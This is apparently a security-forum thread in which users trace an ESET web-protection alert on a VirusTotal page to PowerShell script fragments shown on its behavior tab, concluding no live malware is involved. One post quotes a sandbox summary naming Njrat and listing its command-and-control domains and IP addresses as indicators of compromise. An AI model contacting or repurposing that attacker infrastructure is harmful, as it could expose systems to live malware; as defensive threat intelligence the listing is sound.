User13 0 Posted June 30 Share Posted June 30 Hi when I visit this link https://www.virustotal.com/gui/file/4364a60cc5f7039a24528452680648850d7b3f434c25892d1b3b5e5aa14898fb/detection/f-4364a60cc5f7039a24528452680648850d7b3f434c25892d1b3b5e5aa14898fb-1688041704 it’s infected with PowerShell/TrojanDownloader I’m not sure if its real or false but in my settings, I choose for every automatic action to ask the end user (real time, web access, manual scan, etc.…) for web access scan usually there two option to disconnect or ignore and this should happen in this case because its downloading malware. But what really happened is that the malware downloaded and real time protection catches this malware and ask to clean or ignore and it pass the web protection. I tested this link in edge, chrome, firefox. In edge and chrome the same issue, but in firefox the malware downloaded with no alert at all but when you scan firefox cash folder you can find it there. Why the web access it's not strict in this case and pass the malware? Thanks Quote Link to comment Share on other sites More sharing options...
itman 1,594 Posted June 30 Share Posted June 30 (edited) I get no detection alert from Eset when accessing the posted VT link. Also no download activity that I can detect. It would be highly unlikely that VT would be infected with something. Post the Eset Detection log entry for this download you describe. At this point, it appears you are being redirected to some other web site that is downloading the malware. Also one comment on the VT web page notes; Quote Joe Sandbox Analysis: Verdict: MAL Score: 100/100 Threat Name: Njrat, PasteDownloader Malware Config: see the report for the full malware config Domains: pasteio.com bogota2023.duckdns.org cdn.discordapp.com wtools.io pastebin.com Hosts: 188.114.97.7 188.114.96.7 104.20.68.143 104.21.6.247 46.246.6.11 104.20.67.143 162.159.135.233 HTML Report: https://www.joesandbox.com/analysis/896277/0/html PDF Report: https://www.joesandbox.com/analysis/896277/0/pdf Executive Report: https://www.joesandbox.com/analysis/896277/0/executive Incident Report: https://www.joesandbox.com/analysis/896277/0/irxml IOCs: https://www.joesandbox.com/analysis/896277?idtype=analysisid Edited June 30 by itman Quote Link to comment Share on other sites More sharing options...
User13 0 Posted June 30 Author Share Posted June 30 I record a video for that If you use firefox there is no alert for me either but when you scan firefox cache folder, you will find it there. Quote Link to comment Share on other sites More sharing options...
User13 0 Posted June 30 Author Share Posted June 30 https://dai.ly/k3zuomepTFwJHVzfYBp Quote Link to comment Share on other sites More sharing options...
itman 1,594 Posted June 30 Share Posted June 30 (edited) 45 minutes ago, User13 said: If you use firefox there is no alert for me either but when you scan firefox cache folder, you will find it there. I did. Nothing detected. As far as your video goes, its hard to figure out what you are doing there. What is see is; 1. You're uploading something to VT. 2. Then I see Kaspersky's online web site scanner running. 3. Finally, Eset detection alert for the VT web page running on Chrome. Make a video where you directly access https://www.virustotal.com/gui/file/4364a60cc5f7039a24528452680648850d7b3f434c25892d1b3b5e5aa14898fb/detection/f-4364a60cc5f7039a24528452680648850d7b3f434c25892d1b3b5e5aa14898fb-1688041704 from the browser. Edited June 30 by itman Quote Link to comment Share on other sites More sharing options...
ESET Insiders stackz 102 Posted June 30 ESET Insiders Share Posted June 30 (edited) I can reproduce this. When you go to the VT page you are actually landing on the behavior page and ESET is picking up on some of the displayed Powershell script parts. See example pics below. So essentially there's no live malware to get infected from. At VT: In cache: Edited June 30 by stackz peteyt, itman and Nightowl 3 Quote Link to comment Share on other sites More sharing options...
itman 1,594 Posted June 30 Share Posted June 30 4 minutes ago, stackz said: I can reproduce this. When you go to the VT page you are actually landing on the behavior page Good find! I thought the same initially but when I went to the behavior section from the posted VT link, I couldn't get anything there to trigger a detection. I must not have fully accessed the PowerShell code references. I've had the same Eset behavior on malware analysis web sites where the malware code is shown in clear text. Quote Link to comment Share on other sites More sharing options...
Most Valued Members Nightowl 197 Posted July 2 Most Valued Members Share Posted July 2 I can confirm that it happened to me before when I reported about a zero-day here , I used to access the VT link without uploading something and eset would flag something that isn't happy about , from Linux Endpoint Thanks @stackz for explanation Quote Link to comment Share on other sites More sharing options...
SeriousHoax 80 Posted July 2 Share Posted July 2 Yeah, I have seen this happening with other products that have HTTPS scanning. Usually, products that make use of yara rules are triggered by the yara rules on VT. Saw this the most with Avast, a couple of times Kaspersky and ESET but never with Bitdefender maybe because they don't use yara. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.